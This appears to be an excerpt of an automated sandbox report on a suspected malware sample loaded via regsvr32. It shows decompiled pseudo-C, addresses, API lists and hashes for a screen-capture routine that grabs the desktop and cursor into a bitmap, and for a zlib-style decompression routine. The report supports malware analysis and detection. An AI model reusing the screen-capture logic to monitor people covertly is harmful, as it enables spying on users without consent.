            • Opcode Fuzzy Hash: c49848dfa43f467ec181333fc60d5a812df7b63941279ac27b13c7b62db94e77
            • Instruction Fuzzy Hash: 83111772A05205AFEF14CFA9C4C5AA9B7F8FF49324F118469E95A9B300D774E941CB50
            Uniqueness

            Uniqueness Score: -1.00%

            Non-executed Functions

            Function 00995D1E Relevance: 35.2, APIs: 18, Strings: 2, Instructions: 223windowCOMMON
            Download Yara Rule
            C-Code - Quality: 98%
            			E00995D1E(int* __ecx) {
				signed int _v8;
				char _v12;
				int _v16;
				struct HWND__* _v20;
				struct HWND__* _v24;
				struct HDC__* _v28;
				void* _v32;
				int* _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				void* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				short _v82;
				short _v84;
				signed int _v88;
				signed int _v92;
				struct tagBITMAPINFO _v96;
				intOrPtr _v102;
				int _v110;
				char _v112;
				void* _v116;
				void* _v120;
				void* _v124;
				void* _v132;
				void* _v136;
				void* _v140;
				int _v156;
				signed int _v160;
				void _v164;
				int _t82;
				void* _t84;
				signed int _t92;
				void* _t99;
				char _t103;
				intOrPtr _t113;
				int* _t114;
				struct HDC__* _t120;
				signed int _t124;
				short _t137;
				struct HDC__* _t141;
				void* _t144;
				void* _t148;

				_v36 = __ecx;
				_v24 = 0;
				_t120 = 0;
				_v12 = 0;
				_t144 = 0;
				_v20 = 0;
				_t141 = GetDC(0);
				_v28 = _t141;
				if(_t141 != 0) {
					_t120 = CreateCompatibleDC(_t141);
					if(_t120 != 0) {
						_v8 = GetDeviceCaps(_t141, 8);
						_t82 = GetDeviceCaps(_t141, 0xa);
						_v16 = _t82;
						_t144 = CreateCompatibleBitmap(_t141, _v8, _t82);
						if(_t144 != 0) {
							_t84 = SelectObject(_t120, _t144);
							_v32 = _t84;
							if(_t84 != 0) {
								_t144 = SelectObject(_t120, _v32);
								if(_t144 != 0) {
									GetObjectW(_t144, 0x18,  &_v164);
									_t92 = _v160;
									_t124 = _v156;
									_v92 = _t92;
									_v84 = 1;
									_t137 = 0x20;
									_v82 = _t137;
									_v96.bmiHeader = 0x28;
									_v80 = 0;
									_v76 = 0;
									_v72 = 0;
									_v68 = 0;
									_v64 = 0;
									_v60 = 0;
									asm("cdq");
									_v88 = _t124;
									_v8 = ((_t92 << 5) + 0x1f >> 5) * _t124 << 2;
									_t99 = E00998DC9(((_t92 << 5) + 0x1f >> 5) * _t124 << 2);
									_v20 = _t99;
									if(_t99 != 0) {
										GetDIBits(_t120, _t144, 0, _v156, _t99,  &_v96, 0);
										_v16 = _v8 + 0x36;
										_t103 = E00998DC9(_v8 + 0x36);
										_v12 = _t103;
										if(_t103 != 0) {
											_v110 = _v16;
											_v112 = 0x4d42;
											_v102 = 0x36;
											E00998EA6(_t103,  &_v112, 0xe);
											E00998EA6(_v12 + 0xe,  &_v96, 0x28);
											E00998EA6(_v12 + 0x36, _v20, _v8);
											_t148 = _t148 + 0x24;
											_v8 = _v8 & 0x00000000;
											_t113 = E0099FBFB(_v12, _v16,  &_v8);
											_v24 = _t113;
											if(_t113 != 0) {
												_t114 = _v36;
												if(_t114 != 0) {
													 *_t114 = _v8;
												}
											}
										}
									}
								}
							}
						}
					}
				}
				E00998DDF( &_v20, 0);
				E00998DDF( &_v12, 0);
				if(_t120 != 0) {
					DeleteDC(_t120);
				}
				if(_t141 != 0) {
					DeleteDC(_t141);
				}
				if(_t144 != 0) {
					DeleteObject(_t144);
				}
				return _v24;
			}




















































            0x00995d2a
            0x00995d30
            0x00995d33
            0x00995d35
            0x00995d38
            0x00995d3a
            0x00995d43
            0x00995d45
            0x00995d4a
            0x00995d57
            0x00995d5b
            0x00995d6f
            0x00995d72
            0x00995d78
            0x00995d82
            0x00995d86
            0x00995d8e
            0x00995d94
            0x00995d99
            0x00995e2f
            0x00995e33
            0x00995e43
            0x00995e49
            0x00995e51
            0x00995e58
            0x00995e5b
            0x00995e64
            0x00995e65
            0x00995e6e
            0x00995e75
            0x00995e78
            0x00995e7b
            0x00995e7e
            0x00995e81
            0x00995e84
            0x00995e87
            0x00995e8b
            0x00995e9a
            0x00995e9d
            0x00995ea2
            0x00995ea8
            0x00995ebf
            0x00995ecc
            0x00995ecf
            0x00995ed4
            0x00995eda
            0x00995edf
            0x00995ee7
            0x00995ef2
            0x00995ef9
            0x00995f0e
            0x00995f23
            0x00995f31
            0x00995f34
            0x00995f39
            0x00995f3e
            0x00995f44
            0x00995f46
            0x00995f4b
            0x00995f50
            0x00995f50
            0x00995f4b
            0x00995f44
            0x00995eda
            0x00995ea8
            0x00995e33
            0x00995d99
            0x00995d86
            0x00995d5b
            0x00995f58
            0x00995f63
            0x00995f6d
            0x00995f70
            0x00995f70
            0x00995f78
            0x00995f7b
            0x00995f7b
            0x00995f83
            0x00995f86
            0x00995f86
            0x00995f93

            APIs
            • GetDC.USER32(00000000), ref: 00995D3D
            • CreateCompatibleDC.GDI32(00000000), ref: 00995D51
            • GetDeviceCaps.GDI32(00000000,00000008), ref: 00995D6A
            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00995D72
            • CreateCompatibleBitmap.GDI32(00000000,?,00000000), ref: 00995D7C
            • SelectObject.GDI32(00000000,00000000), ref: 00995D8E
            • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00995DB2
            • GetCursorInfo.USER32(?), ref: 00995DC3
            • CopyIcon.USER32 ref: 00995DD8
            • GetIconInfo.USER32(00000000,?), ref: 00995DE6
            • GetObjectW.GDI32(?,00000018,?), ref: 00995E04
            • DrawIconEx.USER32 ref: 00995E1C
            • SelectObject.GDI32(00000000,?), ref: 00995E29
            • GetObjectW.GDI32(00000000,00000018,?), ref: 00995E43
            • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000028,00000000), ref: 00995EBF
            • DeleteDC.GDI32(00000000), ref: 00995F70
            • DeleteDC.GDI32(00000000), ref: 00995F7B
            • DeleteObject.GDI32(00000000), ref: 00995F86
            Strings
            Memory Dump Source
            • Source File: 00000003.00000002.269120079.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_990000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: Object$DeleteIcon$CapsCompatibleCreateDeviceInfoSelect$BitmapBitsCopyCursorDraw
            • String ID: ($6
            • API String ID: 192358524-4149066357
            • Opcode ID: 0d7c5e038daf02b0188c980b2174fed20b593831f902343cf459e1f8220cc6f1
            • Instruction ID: cdb4e6b06bd8942bc7e5e4e6c6f68bf42cd537d46f860917b6d8f1b5d74783a2
            • Opcode Fuzzy Hash: 0d7c5e038daf02b0188c980b2174fed20b593831f902343cf459e1f8220cc6f1
            • Instruction Fuzzy Hash: 35811AB1D00619ABDF21DBA9DC49BAEBBB8FF49310F154069E505F7250EB309A05DB60
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009A676F Relevance: 8.1, Strings: 6, Instructions: 577COMMONCrypto
            Download Yara Rule
            C-Code - Quality: 81%
            			E009A676F(void* __edi) {
				signed int _t164;
				unsigned int _t172;
				unsigned int _t173;
				signed int _t174;
				signed int _t176;
				signed int _t178;
				signed int _t179;
				signed int _t182;
				signed int _t184;
				unsigned int _t185;
				int _t186;
				int _t194;
				signed char _t200;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				int _t210;
				int _t222;
				signed int _t227;
				signed int _t235;
				signed int _t251;
				signed char _t252;
				unsigned int _t253;
				signed char _t254;
				signed int* _t255;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int _t266;
				intOrPtr _t271;
				signed char _t278;
				signed int _t279;
				char* _t280;
				signed int _t282;
				signed char _t284;
				signed int _t287;
				signed int _t291;
				int _t292;
				int _t293;
				int _t296;
				int _t298;
				int _t302;
				signed int _t305;
				signed char _t311;
				signed char _t312;
				signed char _t315;
				signed char _t316;
				signed int _t318;
				int _t319;
				int _t320;
				signed char _t322;
				int _t324;
				int _t326;
				int _t330;
				signed int _t333;
				signed char _t336;
				signed char _t337;
				signed char _t339;
				int _t341;
				signed int _t347;
				int _t349;
				intOrPtr _t350;
				intOrPtr _t351;
				unsigned int _t356;
				unsigned int _t361;
				signed int _t364;
				signed int _t365;
				intOrPtr _t367;
				void* _t368;
				intOrPtr* _t380;
				void* _t381;
				intOrPtr* _t389;
				void* _t390;
				signed int _t395;
				void* _t396;
				signed int _t397;
				void* _t403;
				void* _t405;
				intOrPtr* _t412;
				void* _t413;
				signed int _t414;
				void* _t416;
				intOrPtr* _t423;
				void* _t424;
				unsigned int _t430;
				signed int _t431;
				void* _t434;
				signed int* _t435;
				void* _t439;

				 *((intOrPtr*)(__edi + 0x56))();
				asm("pushfd");
				_t435 = _t434 - 0x40;
				asm("cld");
				_t395 = _t435[0x16];
				_t367 =  *((intOrPtr*)(_t395 + 0x1c));
				_t164 =  *_t395;
				_t435[0xb] = _t164;
				_t435[5] =  *((intOrPtr*)(_t395 + 4)) + _t164 - 0xb;
				_t271 =  *((intOrPtr*)(_t395 + 0x10));
				_t251 =  *(_t395 + 0xc);
				_t435[0xf] = _t251;
				_t435[0xa] =  ~(_t435[0x17] - _t271) + _t251;
				_t435[4] = _t271 - 0x101 + _t251;
				_t435[2] =  *(_t367 + 0x4c);
				_t435[3] =  *(_t367 + 0x50);
				 *_t435 = (1 <<  *(_t367 + 0x54)) - 1;
				_t435[1] = (1 <<  *(_t367 + 0x58)) - 1;
				_t172 =  *(_t367 + 0x28);
				_t347 =  *(_t367 + 0x34);
				_t435[0xd] = _t172;
				_t435[0xc] =  *(_t367 + 0x30);
				_t435[0xe] = _t347;
				_t430 =  *(_t367 + 0x38);
				_t252 =  *(_t367 + 0x3c);
				_t396 = _t435[0xb];
				_t278 = _t435[5];
				if(_t278 > _t396) {
					L2:
					if((_t396 & 0x00000003) != 0) {
						_t396 = _t396 + 1;
						_t278 = _t252;
						_t252 = _t252 + 8;
						_t172 = 0 << _t278;
						_t430 = _t430 | _t172;
						goto L2;
					}
					goto L4;
				} else {
					_t341 = _t278 + 0xb - _t396;
					_t172 = memset(_t396 + _t341 + _t341, 0, memcpy( &(_t435[7]), _t396, _t341) << 0);
					_t435 =  &(_t435[6]);
					_t278 = 0;
					_t396 =  &(_t435[7]);
					_t435[5] = _t396;
					L4:
					_t368 = _t435[0xf];
					while(1) {
						_t439 =  *0x9ae040 - 2;
						if(_t439 == 0) {
							break;
						}
						if(_t439 > 0) {
							do {
								if(_t252 <= 0xf) {
									asm("lodsw");
									_t322 = _t252;
									_t252 = _t252 + 0x10;
									_t430 = _t431 | 0 << _t322;
								}
								_t173 =  *(_t435[2] + ( *_t435 & _t430) * 4);
								while(1) {
									_t253 = _t252 - _t173;
									_t431 = _t430 >> _t173;
									if(_t173 == 0) {
										asm("stosb");
										goto L22;
									}
									_t356 = _t173 >> 0x10;
									_t311 = _t173;
									if((_t173 & 0x00000010) == 0) {
										if((_t173 & 0x00000040) != 0) {
											L97:
											if((_t173 & 0x00000020) == 0) {
												_t280 = "invalid literal/length code";
												_t350 = 0x1a;
											} else {
												_t280 = 0;
												_t350 = 0xb;
											}
											L101:
											_t174 = _t435[0x16];
											if(_t280 != 0) {
												 *(_t174 + 0x18) = _t280;
											}
											 *((intOrPtr*)( *((intOrPtr*)(_t174 + 0x1c)))) = _t350;
											goto L104;
										}
										_t173 =  *(_t435[2] + (((0x00000001 << _t311) - 0x00000001 & _t431) + _t356) * 4);
										continue;
									}
									_t312 = _t311 & 0x0000000f;
									if(_t312 != 0) {
										if(_t253 < _t312) {
											asm("lodsw");
											_t339 = _t253;
											_t253 = _t253 + 0x10;
											_t431 = _t431 | 0 << _t339;
											_t312 = _t339;
										}
										_t253 = _t253 - _t312;
										_t235 = (0x00000001 << _t312) - 0x00000001 & _t431;
										_t431 = _t431 >> _t312;
										_t356 = _t356 + _t235;
									}
									_t435[6] = _t356;
									if(_t253 <= 0xf) {
										asm("lodsw");
										_t337 = _t253;
										_t253 = _t253 + 0x10;
										_t431 = _t431 | 0 << _t337;
									}
									_t200 =  *(_t435[3] + (_t435[1] & _t431) * 4);
									while(1) {
										_t361 = _t200 >> 0x10;
										_t253 = _t253 - _t200;
										_t431 = _t431 >> _t200;
										_t315 = _t200;
										if((_t200 & 0x00000010) != 0) {
											break;
										}
										if((_t200 & 0x00000040) != 0) {
											L96:
											_t280 = "invalid distance code";
											_t350 = 0x1a;
											goto L101;
										}
										_t200 =  *(_t435[3] + (((0x00000001 << _t315) - 0x00000001 & _t431) + _t361) * 4);
									}
									_t316 = _t315 & 0x0000000f;
									if(_t316 == 0) {
										if(_t361 != 1 || _t435[0xa] == _t368) {
											L38:
											_t435[0xb] = _t396;
											_t207 = _t368 - _t435[0xa];
											if(_t207 < _t361) {
												_t208 = _t435[0xd];
												_t318 =  ~_t207;
												_t414 = _t435[0xe];
												if(_t208 < _t361) {
													L100:
													_t396 = _t435[0xb];
													_t280 = "invalid distance too far back";
													_t350 = 0x1a;
													goto L101;
												}
												_t319 = _t318 + _t361;
												if(_t435[0xc] != 0) {
													_t209 = _t435[0xc];
													if(_t319 <= _t209) {
														_t416 = _t414 + _t209 - _t319;
														_t210 = _t435[6];
														if(_t210 > _t319) {
															_t210 = memcpy(_t368, _t416, _t319);
															_t435 =  &(_t435[3]);
															_t368 = _t416 + _t319 + _t319;
															_t416 = _t368 - _t361;
														}
													} else {
														_t416 = _t414 + _t435[0xd] + _t209 - _t319;
														_t324 = _t319 - _t209;
														_t210 = _t435[6];
														if(_t210 > _t324) {
															_t210 = memcpy(_t368, _t416, _t324);
															_t435 =  &(_t435[3]);
															_t368 = _t416 + _t324 + _t324;
															_t416 = _t435[0xe];
															_t326 = _t435[0xc];
															if(_t210 > _t326) {
																_t210 = memcpy(_t368, _t416, _t326);
																_t435 =  &(_t435[3]);
																_t368 = _t416 + _t326 + _t326;
																_t416 = _t368 - _t361;
															}
														}
													}
												} else {
													_t416 = _t414 + _t208 - _t319;
													_t210 = _t435[6];
													if(_t210 > _t319) {
														_t210 = memcpy(_t368, _t416, _t319);
														_t435 =  &(_t435[3]);
														_t368 = _t416 + _t319 + _t319;
														_t416 = _t368 - _t361;
													}
												}
												_t320 = _t210;
												memcpy(_t368, _t416, _t320);
												_t435 =  &(_t435[3]);
												_t368 = _t416 + _t320 + _t320;
												_t396 = _t435[0xb];
												goto L22;
											}
											_t423 = _t368 - _t361;
											_t330 = _t435[6] - 3;
											 *_t368 =  *_t423;
											_t424 = _t423 + 3;
											 *((char*)(_t368 + 1)) =  *((intOrPtr*)(_t423 + 1));
											 *((char*)(_t368 + 2)) =  *((intOrPtr*)(_t423 + 2));
											memcpy(_t368 + 3, _t424, _t330);
											_t435 =  &(_t435[3]);
											_t368 = _t424 + _t330 + _t330;
											_t396 = _t435[0xb];
										} else {
											_t389 = _t368 - 1;
											_t222 =  *_t389;
											_t333 = _t435[6] - 3;
											 *(_t389 + 1) = _t222;
											 *(_t389 + 2) = _t222;
											 *(_t389 + 3) = _t222;
											_t390 = _t389 + 4;
											memset(_t390, _t222, _t333 << 0);
											_t435 =  &(_t435[3]);
											_t368 = _t390 + _t333;
										}
										goto L22;
									}
									if(_t253 < _t316) {
										asm("lodsw");
										_t336 = _t253;
										_t253 = _t253 + 0x10;
										_t431 = _t431 | 0 << _t336;
										_t316 = _t336;
									}
									_t253 = _t253 - _t316;
									_t227 = (0x00000001 << _t316) - 0x00000001 & _t431;
									_t431 = _t431 >> _t316;
									_t361 = _t361 + _t227;
									goto L38;
								}
								L22:
							} while (_t435[4] > _t368 && _t435[5] > _t396);
							L104:
							if( *0x9ae040 == 2) {
								_t253 = _t431;
							}
							_t176 = _t435[0x16];
							_t351 =  *((intOrPtr*)(_t176 + 0x1c));
							_t282 = _t253 >> 3;
							_t397 = _t396 - _t282;
							_t254 = _t253 - (_t282 << 3);
							 *(_t176 + 0xc) = _t368;
							 *(_t351 + 0x3c) = _t254;
							_t284 = _t254;
							_t255 =  &(_t435[7]);
							if(_t435[5] == _t255) {
								_t266 =  *_t176;
								_t435[5] = _t266;
								_t397 = _t397 - _t255 + _t266;
								_t435[5] = _t435[5] +  *((intOrPtr*)(_t176 + 4)) - 0xb;
							}
							 *_t176 = _t397;
							_t258 = (1 << _t284) - 1;
							if( *0x9ae040 == 2) {
								asm("psrlq mm0, mm1");
								asm("movd ebp, mm0");
								asm("emms");
							}
							 *(_t351 + 0x38) = _t431 & _t258;
							_t259 = _t435[5];
							if(_t259 <= _t397) {
								 *((intOrPtr*)(_t176 + 4)) =  ~(_t397 - _t259) + 0xb;
							} else {
								 *((intOrPtr*)(_t176 + 4)) = _t259 - _t397 + 0xb;
							}
							_t260 = _t435[4];
							if(_t260 <= _t368) {
								 *((intOrPtr*)(_t176 + 0x10)) =  ~(_t368 - _t260) + 0x101;
							} else {
								 *((intOrPtr*)(_t176 + 0x10)) = _t260 - _t368 + 0x101;
							}
							asm("popfd");
							return _t176;
						}
						_push(_t172);
						_push(_t252);
						_push(_t278);
						_push(_t347);
						asm("pushfd");
						 *_t435 =  *_t435 ^ 0x00200000;
						asm("popfd");
						asm("pushfd");
						_pop(_t364);
						_t365 = _t364 ^  *_t435;
						if(_t365 == 0) {
							L15:
							 *0x9ae040 = 3;
							L16:
							_pop(_t347);
							_pop(_t278);
							_pop(_t252);
							_pop(_t172);
							continue;
						}
						asm("cpuid");
						if(_t252 != 0x756e6547 || _t278 != 0x6c65746e || _t365 != 0x49656e69) {
							goto L15;
						} else {
							asm("cpuid");
							if(0xd != 6 || (_t365 & 0x00800000) == 0) {
								goto L15;
							} else {
								 *0x9ae040 = 2;
								goto L16;
							}
						}
					}
					asm("emms");
					asm("movd mm0, ebp");
					_t431 = _t252;
					asm("movd mm4, dword [esp]");
					asm("movq mm3, mm4");
					asm("movd mm5, dword [esp+0x4]");
					asm("movq mm2, mm5");
					asm("pxor mm1, mm1");
					_t253 = _t435[2];
					do {
						asm("psrlq mm0, mm1");
						if(_t431 <= 0x20) {
							asm("movd mm6, ebp");
							asm("movd mm7, dword [esi]");
							_t396 = _t396 + 4;
							asm("psllq mm7, mm6");
							_t431 = _t431 + 0x20;
							asm("por mm0, mm7");
						}
						asm("pand mm4, mm0");
						asm("movd eax, mm4");
						asm("movq mm4, mm3");
						_t173 =  *(_t253 + _t172 * 4);
						while(1) {
							_t279 = _t173 & 0x000000ff;
							asm("movd mm1, ecx");
							_t431 = _t431 - _t279;
							if(_t173 == 0) {
								break;
							}
							_t349 = _t173 >> 0x10;
							if((_t173 & 0x00000010) == 0) {
								if((_t173 & 0x00000040) != 0) {
									goto L97;
								}
								asm("psrlq mm0, mm1");
								asm("movd ecx, mm0");
								_t173 =  *(_t253 + ((_t279 &  *(0x9a66ec + (_t173 & 0x0000000f) * 4)) + _t349) * 4);
								continue;
							}
							_t178 = _t173 & 0x0000000f;
							if(_t178 != 0) {
								asm("psrlq mm0, mm1");
								asm("movd mm1, eax");
								asm("movd ecx, mm0");
								_t431 = _t431 - _t178;
								_t349 = _t349 + (_t279 &  *(0x9a66ec + _t178 * 4));
							}
							asm("psrlq mm0, mm1");
							if(_t431 <= 0x20) {
								asm("movd mm6, ebp");
								asm("movd mm7, dword [esi]");
								_t396 = _t396 + 4;
								asm("psllq mm7, mm6");
								_t431 = _t431 + 0x20;
								asm("por mm0, mm7");
							}
							asm("pand mm5, mm0");
							asm("movd eax, mm5");
							asm("movq mm5, mm2");
							_t179 =  *(_t435[3] + _t178 * 4);
							while(1) {
								_t287 = _t179 & 0x000000ff;
								_t253 = _t179 >> 0x10;
								_t431 = _t431 - _t287;
								asm("movd mm1, ecx");
								if((_t179 & 0x00000010) != 0) {
									break;
								}
								if((_t179 & 0x00000040) != 0) {
									goto L96;
								}
								asm("psrlq mm0, mm1");
								asm("movd ecx, mm0");
								_t179 =  *(_t435[3] + ((_t287 &  *(0x9a66ec + (_t179 & 0x0000000f) * 4)) + _t253) * 4);
							}
							_t182 = _t179 & 0x0000000f;
							if(_t182 == 0) {
								if(_t253 != 1 || _t435[0xa] == _t368) {
									L76:
									_t435[0xb] = _t396;
									_t184 = _t368 - _t435[0xa];
									if(_t184 < _t253) {
										_t185 = _t435[0xd];
										_t291 =  ~_t184;
										_t403 = _t435[0xe];
										if(_t185 < _t253) {
											goto L100;
										}
										_t292 = _t291 + _t253;
										if(_t435[0xc] != 0) {
											_t186 = _t435[0xc];
											if(_t292 <= _t186) {
												_t405 = _t403 + _t186 - _t292;
												if(_t349 > _t292) {
													_t349 = _t349 - _t292;
													memcpy(_t368, _t405, _t292);
													_t435 =  &(_t435[3]);
													_t368 = _t405 + _t292 + _t292;
													_t405 = _t368 - _t253;
												}
											} else {
												_t405 = _t403 + _t435[0xd] + _t186 - _t292;
												_t296 = _t292 - _t186;
												if(_t349 > _t296) {
													_t349 = _t349 - _t296;
													memcpy(_t368, _t405, _t296);
													_t435 =  &(_t435[3]);
													_t368 = _t405 + _t296 + _t296;
													_t405 = _t435[0xe];
													_t298 = _t435[0xc];
													if(_t349 > _t298) {
														_t349 = _t349 - _t298;
														memcpy(_t368, _t405, _t298);
														_t435 =  &(_t435[3]);
														_t368 = _t405 + _t298 + _t298;
														_t405 = _t368 - _t253;
													}
												}
											}
										} else {
											_t405 = _t403 + _t185 - _t292;
											if(_t349 > _t292) {
												_t349 = _t349 - _t292;
												memcpy(_t368, _t405, _t292);
												_t435 =  &(_t435[3]);
												_t368 = _t405 + _t292 + _t292;
												_t405 = _t368 - _t253;
											}
										}
										_t293 = _t349;
										_t172 = memcpy(_t368, _t405, _t293);
										_t435 =  &(_t435[3]);
										_t368 = _t405 + _t293 + _t293;
										_t396 = _t435[0xb];
										_t253 = _t435[2];
										goto L64;
									}
									_t412 = _t368 - _t253;
									_t302 = _t349 - 3;
									 *_t368 =  *_t412;
									_t413 = _t412 + 3;
									 *((char*)(_t368 + 1)) =  *((intOrPtr*)(_t412 + 1));
									 *((char*)(_t368 + 2)) =  *((intOrPtr*)(_t412 + 2));
									_t172 = memcpy(_t368 + 3, _t413, _t302);
									_t435 =  &(_t435[3]);
									_t368 = _t413 + _t302 + _t302;
									_t396 = _t435[0xb];
									_t253 = _t435[2];
									goto L64;
								} else {
									_t380 = _t368 - 1;
									_t194 =  *_t380;
									_t305 = _t349 - 3;
									 *(_t380 + 1) = _t194;
									 *(_t380 + 2) = _t194;
									 *(_t380 + 3) = _t194;
									_t381 = _t380 + 4;
									_t172 = memset(_t381, _t194, _t305 << 0);
									_t435 =  &(_t435[3]);
									_t368 = _t381 + _t305;
									_t253 = _t435[2];
									L64:
									if(_t435[4] <= _t368) {
										goto L104;
									}
									goto L65;
								}
							}
							asm("psrlq mm0, mm1");
							asm("movd mm1, eax");
							asm("movd ecx, mm0");
							_t431 = _t431 - _t182;
							_t253 = _t253 + (_t287 &  *(0x9a66ec + _t182 * 4));
							goto L76;
						}
						_t172 = _t173 >> 0x10;
						asm("stosb");
						goto L64;
						L65:
					} while (_t435[5] > _t396);
					goto L104;
				}
			}




























































































            0x009a676f
            0x009a6774
            0x009a6775
            0x009a6778
            0x009a6779
            0x009a677d
            0x009a6783
            0x009a678a
            0x009a678e
            0x009a6796
            0x009a6799
            0x009a67aa
            0x009a67ae
            0x009a67b2
            0x009a67bc
            0x009a67c0
            0x009a67cf
            0x009a67dd
            0x009a67e1
            0x009a67e7
            0x009a67ea
            0x009a67ee
            0x009a67f2
            0x009a67f6
            0x009a67f9
            0x009a67fc
            0x009a6800
            0x009a6806
            0x009a682a
            0x009a6830
            0x009a6836
            0x009a6837
            0x009a6839
            0x009a683c
            0x009a683e
            0x00000000
            0x009a683e
            0x00000000
            0x009a6808
            0x009a680b
            0x009a681e
            0x009a681e
            0x009a681e
            0x009a6820
            0x009a6824
            0x009a6842
            0x009a6842
            0x009a6846
            0x009a6846
            0x009a684d
            0x00000000
            0x00000000
            0x009a6853
            0x009a68c0
            0x009a68c3
            0x009a68c7
            0x009a68c9
            0x009a68cb
            0x009a68d0
            0x009a68d0
            0x009a68db
            0x009a68de
            0x009a68e0
            0x009a68e2
            0x009a68e6
            0x009a68eb
            0x009a68eb
            0x009a68eb
            0x009a6903
            0x009a6906
            0x009a690a
            0x009a6a06
            0x009a6d1a
            0x009a6d1c
            0x009a6d2a
            0x009a6d2f
            0x009a6d1e
            0x009a6d1e
            0x009a6d23
            0x009a6d23
            0x009a6d46
            0x009a6d46
            0x009a6d4c
            0x009a6d4e
            0x009a6d4e
            0x009a6d54
            0x00000000
            0x009a6d54
            0x009a6a1c
            0x00000000
            0x009a6a1c
            0x009a6910
            0x009a6913
            0x009a6917
            0x009a691d
            0x009a691f
            0x009a6921
            0x009a6926
            0x009a6928
            0x009a6928
            0x009a6932
            0x009a6934
            0x009a6936
            0x009a6938
            0x009a6938
            0x009a693a
            0x009a6941
            0x009a6945
            0x009a6947
            0x009a6949
            0x009a694e
            0x009a694e
            0x009a695a
            0x009a695d
            0x009a695f
            0x009a6964
            0x009a6966
            0x009a6968
            0x009a696c
            0x00000000
            0x00000000
            0x009a6a26
            0x009a6d0e
            0x009a6d0e
            0x009a6d13
            0x00000000
            0x009a6d13
            0x009a6a3c
            0x009a6a3c
            0x009a6972
            0x009a6975
            0x009a69df
            0x009a699e
            0x009a699e
            0x009a69a4
            0x009a69aa
            0x009a6a46
            0x009a6a4a
            0x009a6a4c
            0x009a6a52
            0x009a6d36
            0x009a6d36
            0x009a6d3a
            0x009a6d3f
            0x00000000
            0x009a6d3f
            0x009a6a58
            0x009a6a5f
            0x009a6a85
            0x009a6a8b
            0x009a6abb
            0x009a6abd
            0x009a6ac3
            0x009a6ac7
            0x009a6ac7
            0x009a6ac7
            0x009a6acb
            0x009a6acb
            0x009a6a8d
            0x009a6a93
            0x009a6a95
            0x009a6a97
            0x009a6a9d
            0x009a6aa1
            0x009a6aa1
            0x009a6aa1
            0x009a6aa3
            0x009a6aa7
            0x009a6aad
            0x009a6ab1
            0x009a6ab1
            0x009a6ab1
            0x009a6ab5
            0x009a6ab5
            0x009a6aad
            0x009a6a9d
            0x009a6a61
            0x009a6a63
            0x009a6a65
            0x009a6a6b
            0x009a6a6f
            0x009a6a6f
            0x009a6a6f
            0x009a6a73
            0x009a6a73
            0x009a6a6b
            0x009a6acd
            0x009a6acf
            0x009a6acf
            0x009a6acf
            0x009a6ad1
            0x00000000
            0x009a6ad1
            0x009a69b6
            0x009a69b8
            0x009a69bd
            0x009a69c5
            0x009a69c8
            0x009a69cb
            0x009a69d1
            0x009a69d1
            0x009a69d1
            0x009a69d3
            0x009a69e7
            0x009a69e7
            0x009a69ec
            0x009a69ee
            0x009a69f1
            0x009a69f4
            0x009a69f7
            0x009a69fa
            0x009a69fd
            0x009a69fd
            0x009a69fd
            0x009a69fd
            0x00000000
            0x009a69df
            0x009a6979
            0x009a697f
            0x009a6981
            0x009a6983
            0x009a6988
            0x009a698a
            0x009a698a
            0x009a6994
            0x009a6996
            0x009a6998
            0x009a699a
            0x00000000
            0x009a699a
            0x009a68ec
            0x009a68ec
            0x009a6d58
            0x009a6d5f
            0x009a6d61
            0x009a6d61
            0x009a6d63
            0x009a6d69
            0x009a6d6c
            0x009a6d6f
            0x009a6d74
            0x009a6d76
            0x009a6d79
            0x009a6d7c
            0x009a6d7e
            0x009a6d86
            0x009a6d8a
            0x009a6d8c
            0x009a6d90
            0x009a6d98
            0x009a6d98
            0x009a6d9c
            0x009a6da5
            0x009a6dad
            0x009a6daf
            0x009a6db2
            0x009a6db5
            0x009a6db5
            0x009a6db9
            0x009a6dbc
            0x009a6dc2
            0x009a6dd5
            0x009a6dc4
            0x009a6dc9
            0x009a6dc9
            0x009a6dd8
            0x009a6dde
            0x009a6df7
            0x009a6de0
            0x009a6de8
            0x009a6de8
            0x009a6dfd
            0x009a6e02
            0x009a6e02
            0x009a6855
            0x009a6856
            0x009a6857
            0x009a6858
            0x009a6859
            0x009a685d
            0x009a6864
            0x009a6865
            0x009a6866
            0x009a6867
            0x009a6869
            0x009a68af
            0x009a68af
            0x009a68b9
            0x009a68b9
            0x009a68ba
            0x009a68bb
            0x009a68bc
            0x00000000
            0x009a68bc
            0x009a686d
            0x009a6875
            0x00000000
            0x009a6887
            0x009a688c
            0x009a6897
            0x00000000
            0x009a68a3
            0x009a68a3
            0x00000000
            0x009a68a3
            0x009a6897
            0x009a6875
            0x009a6adc
            0x009a6ade
            0x009a6ae1
            0x009a6ae3
            0x009a6ae7
            0x009a6aea
            0x009a6aef
            0x009a6af2
            0x009a6af5
            0x009a6afc
            0x009a6afc
            0x009a6b02
            0x009a6b04
            0x009a6b07
            0x009a6b0a
            0x009a6b0d
            0x009a6b10
            0x009a6b13
            0x009a6b13
            0x009a6b16
            0x009a6b19
            0x009a6b1c
            0x009a6b1f
            0x009a6b22
            0x009a6b22
            0x009a6b25
            0x009a6b28
            0x009a6b2c
            0x00000000
            0x00000000
            0x009a6b49
            0x009a6b4e
            0x009a6c36
            0x00000000
            0x00000000
            0x009a6c3f
            0x009a6c42
            0x009a6c4e
            0x00000000
            0x009a6c4e
            0x009a6b54
            0x009a6b57
            0x009a6b59
            0x009a6b5c
            0x009a6b5f
            0x009a6b62
            0x009a6b6b
            0x009a6b6b
            0x009a6b6d
            0x009a6b73
            0x009a6b75
            0x009a6b78
            0x009a6b7b
            0x009a6b7e
            0x009a6b81
            0x009a6b84
            0x009a6b84
            0x009a6b8b
            0x009a6b8e
            0x009a6b91
            0x009a6b94
            0x009a6b97
            0x009a6b97
            0x009a6b9c
            0x009a6b9f
            0x009a6ba1
